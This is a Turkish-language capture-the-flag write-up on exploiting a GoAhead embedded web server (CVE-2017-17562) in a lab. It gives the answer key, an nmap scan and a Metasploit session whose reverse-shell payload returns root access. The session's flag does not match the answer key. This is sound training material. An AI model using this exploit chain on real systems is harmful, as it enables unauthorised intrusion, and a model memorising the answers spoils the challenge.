# Hack Embedded Server!


**Açıklama**:

CyberPath Bank sizi sızma testi sağlayıcısı olarak işe aldı. Bu hafta HTTP Serverları test etmeniz istendi. Teste embedded serverlar ile başlamanız gerekiyor. Embedded Server'da goahead çalıştığını biliyorsunuz.

GoAhead, dünyanın en popüler, küçük gömülü web sunucusudur. Kompakt, güvenli ve kullanımı kolaydır. GoAhead yüz milyonlarca cihaza dağıtılır ve en küçük gömülü cihazlar için idealdir.

**Amaç**:

- Ip adresi ile enum gerçekleştirip çalışan servisleri belirlemek.
- Zaafiyetli servisi ve CVE ID'sini bulmak.
- Gerekli metasploit modülünü belirlemek.
- Server'ı ele geçirmek.

**Flags**:
- Nmap vuln scan yapın. Nmap ilgi çekici sonuçlar döndürecektir. Mevcut servisin CVE numarası nedir?
    - **CVE-2017-17562**
- CVE numarası için exploit modülünü bulunuz?
    - answer: **exploit/linux/http/goahead_ldpreload**
- flag.txt?
    - answer: **CyberPath{J3hJeKxjQL2bECvT}**

## **Solution**:

```bash
attacker@cyberpath:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.0.2  netmask 255.255.255.0  broadcast 10.0.0.255
        ether 02:42:0a:00:00:02  txqueuelen 0  (Ethernet)
        RX packets 572  bytes 36359 (36.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 434  bytes 131927 (131.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 8  bytes 554 (554.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8  bytes 554 (554.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

attacker@cyberpath:~$ sudo nmap -sC -sV -O --script vuln 10.0.0.30 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 19:23 UTC
Nmap scan report for http_0_web_1.http_0_internal_network (10.0.0.30)
Host is up (0.00020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT    STATE SERVICE   VERSION
80/tcp  open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     Date: Wed Dec 22 19:23:24 2021
|     Content-Length: 145
|     Connection: close
|     X-Frame-Options: SAMEORIGIN
|     <html>
|     <head><title>Document Error: Not Found</title></head>
|     <body>
|     <h2>Access Error: Not Found</h2>
|     </body>
|     </html>
|   GetRequest:
|     HTTP/1.0 302 Redirect
|     Date: Wed Dec 22 19:23:18 2021
|     Content-Length: 214
|     Connection: close
|     Location: http://localhost/index.html
|     X-Frame-Options: SAMEORIGIN
|     <html><head></head><body>
|     This document has moved to a new <a href="http://localhost/index.html">location</a>.
|     Please update your documents to reflect the new location.
|     </body></html>
|   HTTPOptions:
|     HTTP/1.0 406 Not Acceptable
|     Date: Wed Dec 22 19:23:18 2021
|     Content-Length: 20
|     Connection: close
|     X-Frame-Options: SAMEORIGIN
|     Unsupported method
|   RTSPRequest:
|     HTTP/1.0 406 Not Acceptable
|     Date: Wed Dec 22 19:23:18 2021
|     Content-Length: 155
|     Connection: close
|     X-Frame-Options: SAMEORIGIN
|     <html>
|     <head><title>Document Error: Not Acceptable</title></head>
|     <body>
|     <h2>Access Error: Not Acceptable</h2>
|     </body>
|     </html>
|   SIPOptions:
|     HTTP/1.0 400 Bad Request
|     Date: Wed Dec 22 19:24:29 2021
|     Content-Length: 149
|     Connection: close
|     X-Frame-Options: SAMEORIGIN
|     <html>
|     <head><title>Document Error: Bad Request</title></head>
|     <body>
|     <h2>Access Error: Bad Request</h2>
|     </body>
|_    </html>
443/tcp open  ssl/https
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     Date: Wed Dec 22 19:23:24 2021
|     Content-Length: 145
|     Connection: close
|     X-Frame-Options: SAMEORIGIN
|     <html>
|     <head><title>Document Error: Not Found</title></head>
|     <body>
|     <h2>Access Error: Not Found</h2>
|     </body>
|     </html>
|   GetRequest:
|     HTTP/1.0 302 Redirect
|     Date: Wed Dec 22 19:23:24 2021
|     Content-Length: 215
|     Connection: close
|     Location: https://localhost/index.html
|     X-Frame-Options: SAMEORIGIN
|     <html><head></head><body>
|     This document has moved to a new <a href="https://localhost/index.html">location</a>.
|     Please update your documents to reflect the new location.
|     </body></html>
|   HTTPOptions:
|     HTTP/1.0 406 Not Acceptable
|     Date: Wed Dec 22 19:23:24 2021
|     Content-Length: 20
|     Connection: close
|     X-Frame-Options: SAMEORIGIN
|     Unsupported method
|   RTSPRequest:
|     HTTP/1.0 406 Not Acceptable
|     Date: Wed Dec 22 19:23:34 2021
|     Content-Length: 155
|     Connection: close
|     X-Frame-Options: SAMEORIGIN
|     <html>
|     <head><title>Document Error: Not Acceptable</title></head>
|     <body>
|     <h2>Access Error: Not Acceptable</h2>
|     </body>
|     </html>
|   SIPOptions:
|     HTTP/1.0 400 Bad Request
|     Date: Wed Dec 22 19:24:39 2021
|     Content-Length: 149
|     Connection: close
|     X-Frame-Options: SAMEORIGIN
|     <html>
|     <head><title>Document Error: Bad Request</title></head>
|     <body>
|     <h2>Access Error: Bad Request</h2>
|     </body>
|_    </html>
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.92%I=7%D=12/22%Time=61C37B26%P=x86_64-pc-linux-gnu%r(Get
SF:Request,17B,"HTTP/1\.0\x20302\x20Redirect\r\nDate:\x20Wed\x20Dec\x2022\
SF:x2019:23:18\x202021\r\nContent-Length:\x20214\r\nConnection:\x20close\r
SF:\nLocation:\x20http://localhost/index\.html\r\nX-Frame-Options:\x20SAME
SF:ORIGIN\r\n\r\n<html><head></head><body>\r\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20This\x20document\x20has\x20moved\x20to\x20a\x20new\x20<a\x20href=\"
SF:http://localhost/index\.html\">location</a>\.\r\n\x20\x20\x20\x20\x20\x
SF:20\x20\x20Please\x20update\x20your\x20documents\x20to\x20reflect\x20the
SF:\x20new\x20location\.\r\n\x20\x20\x20\x20\x20\x20\x20\x20</body></html>
SF:\r\n\r\n")%r(HTTPOptions,97,"HTTP/1\.0\x20406\x20Not\x20Acceptable\r\nD
SF:ate:\x20Wed\x20Dec\x2022\x2019:23:18\x202021\r\nContent-Length:\x2020\r
SF:\nConnection:\x20close\r\nX-Frame-Options:\x20SAMEORIGIN\r\n\r\nUnsuppo
SF:rted\x20method\r\n")%r(RTSPRequest,11F,"HTTP/1\.0\x20406\x20Not\x20Acce
SF:ptable\r\nDate:\x20Wed\x20Dec\x2022\x2019:23:18\x202021\r\nContent-Leng
SF:th:\x20155\r\nConnection:\x20close\r\nX-Frame-Options:\x20SAMEORIGIN\r\
SF:n\r\n<html>\r\n\x20\x20\x20\x20<head><title>Document\x20Error:\x20Not\x
SF:20Acceptable</title></head>\r\n\x20\x20\x20\x20<body>\r\n\x20\x20\x20\x
SF:20\x20\x20\x20\x20<h2>Access\x20Error:\x20Not\x20Acceptable</h2>\r\n\x2
SF:0\x20\x20\x20</body>\r\n</html>\r\n\r\n")%r(FourOhFourRequest,110,"HTTP
SF:/1\.0\x20404\x20Not\x20Found\r\nDate:\x20Wed\x20Dec\x2022\x2019:23:24\x
SF:202021\r\nContent-Length:\x20145\r\nConnection:\x20close\r\nX-Frame-Opt
SF:ions:\x20SAMEORIGIN\r\n\r\n<html>\r\n\x20\x20\x20\x20<head><title>Docum
SF:ent\x20Error:\x20Not\x20Found</title></head>\r\n\x20\x20\x20\x20<body>\
SF:r\n\x20\x20\x20\x20\x20\x20\x20\x20<h2>Access\x20Error:\x20Not\x20Found
SF:</h2>\r\n\x20\x20\x20\x20</body>\r\n</html>\r\n\r\n")%r(SIPOptions,116,
SF:"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Wed\x20Dec\x2022\x2019:
SF:24:29\x202021\r\nContent-Length:\x20149\r\nConnection:\x20close\r\nX-Fr
SF:ame-Options:\x20SAMEORIGIN\r\n\r\n<html>\r\n\x20\x20\x20\x20<head><titl
SF:e>Document\x20Error:\x20Bad\x20Request</title></head>\r\n\x20\x20\x20\x
SF:20<body>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<h2>Access\x20Error:\x20Bad
SF:\x20Request</h2>\r\n\x20\x20\x20\x20</body>\r\n</html>\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port443-TCP:V=7.92%T=SSL%I=7%D=12/22%Time=61C37B2C%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,17D,"HTTP/1\.0\x20302\x20Redirect\r\nDate:\x20Wed\x20Dec
SF:\x2022\x2019:23:24\x202021\r\nContent-Length:\x20215\r\nConnection:\x20
SF:close\r\nLocation:\x20https://localhost/index\.html\r\nX-Frame-Options:
SF:\x20SAMEORIGIN\r\n\r\n<html><head></head><body>\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20This\x20document\x20has\x20moved\x20to\x20a\x20new\x20<a\x2
SF:0href=\"https://localhost/index\.html\">location</a>\.\r\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20Please\x20update\x20your\x20documents\x20to\x20refle
SF:ct\x20the\x20new\x20location\.\r\n\x20\x20\x20\x20\x20\x20\x20\x20</bod
SF:y></html>\r\n\r\n")%r(HTTPOptions,97,"HTTP/1\.0\x20406\x20Not\x20Accept
SF:able\r\nDate:\x20Wed\x20Dec\x2022\x2019:23:24\x202021\r\nContent-Length
SF::\x2020\r\nConnection:\x20close\r\nX-Frame-Options:\x20SAMEORIGIN\r\n\r
SF:\nUnsupported\x20method\r\n")%r(FourOhFourRequest,110,"HTTP/1\.0\x20404
SF:\x20Not\x20Found\r\nDate:\x20Wed\x20Dec\x2022\x2019:23:24\x202021\r\nCo
SF:ntent-Length:\x20145\r\nConnection:\x20close\r\nX-Frame-Options:\x20SAM
SF:EORIGIN\r\n\r\n<html>\r\n\x20\x20\x20\x20<head><title>Document\x20Error
SF::\x20Not\x20Found</title></head>\r\n\x20\x20\x20\x20<body>\r\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20<h2>Access\x20Error:\x20Not\x20Found</h2>\r\n\x2
SF:0\x20\x20\x20</body>\r\n</html>\r\n\r\n")%r(RTSPRequest,11F,"HTTP/1\.0\
SF:x20406\x20Not\x20Acceptable\r\nDate:\x20Wed\x20Dec\x2022\x2019:23:34\x2
SF:02021\r\nContent-Length:\x20155\r\nConnection:\x20close\r\nX-Frame-Opti
SF:ons:\x20SAMEORIGIN\r\n\r\n<html>\r\n\x20\x20\x20\x20<head><title>Docume
SF:nt\x20Error:\x20Not\x20Acceptable</title></head>\r\n\x20\x20\x20\x20<bo
SF:dy>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<h2>Access\x20Error:\x20Not\x20A
SF:cceptable</h2>\r\n\x20\x20\x20\x20</body>\r\n</html>\r\n\r\n")%r(SIPOpt
SF:ions,116,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Wed\x20Dec\x20
SF:22\x2019:24:39\x202021\r\nContent-Length:\x20149\r\nConnection:\x20clos
SF:e\r\nX-Frame-Options:\x20SAMEORIGIN\r\n\r\n<html>\r\n\x20\x20\x20\x20<h
SF:ead><title>Document\x20Error:\x20Bad\x20Request</title></head>\r\n\x20\
SF:x20\x20\x20<body>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<h2>Access\x20Erro
SF:r:\x20Bad\x20Request</h2>\r\n\x20\x20\x20\x20</body>\r\n</html>\r\n\r\n
SF:");
MAC Address: 02:42:0A:00:00:1E (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 184.56 seconds
attacker@cyberpath:~$ msfconsole

               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:
                                :::::::+:
                      Metasploit

       =[ metasploit v6.1.12-dev                          ]
+ -- --=[ 2176 exploits - 1152 auxiliary - 399 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Writing a custom module? After editing your
module, why not try the reload command

msf6 > use exploit/linux/http/goahead_ldpreload
[*] No payload configured, defaulting to cmd/unix/reverse_stub
msf6 exploit(linux/http/goahead_ldpreload) >show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic (Reverse Shell)
   1   Automatic (Bind Shell)
   2   Automatic (Command)
   3   Linux x86
   4   Linux x86_64
   5   Linux ARM (LE)
   6   Linux ARM64
   7   Linux MIPS
   8   Linux MIPSLE
   9   Linux MIPS64
   10  Linux MIPS64LE
   11  Linux SPARC
   12  Linux SPARC64
   13  Linux s390x


msf6 exploit(linux/http/goahead_ldpreload) > set target 4
target => 4
msf6 exploit(linux/http/goahead_ldpreload) > show options

Module options (exploit/linux/http/goahead_ldpreload):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGET_URI                   no        The path to a CGI script on the GoAhead server
   VHOST                        no        HTTP server virtual host


Payload options (cmd/unix/reverse_stub):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.2         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   Linux x86_64


msf6 exploit(linux/http/goahead_ldpreload) > set payload linux/x64/shell_reverse_tcp
payload => linux/x64/shell_reverse_tcp
msf6 exploit(linux/http/goahead_ldpreload) > set rhosts 10.0.0.30
rhosts => 10.0.0.30
msf6 exploit(linux/http/goahead_ldpreload) > check

[*] Searching 390 paths for an exploitable CGI endpoint...
[+] Exploitable CGI located at /cgi-bin/index
[+] 10.0.0.30:80 - The target is vulnerable.
msf6 exploit(linux/http/goahead_ldpreload) > run

[*] Started reverse TCP handler on 10.0.0.2:4444
[*] Searching 390 paths for an exploitable CGI endpoint...
[+] Exploitable CGI located at /cgi-bin/index
[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.30:46124 ) at 2021-12-22 19:27:54 +0000

whoami
root
pwd
/var/www/goahead
cd /
ls
bin
boot
dev
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
cat flag.txt
CyberPath{flag}
```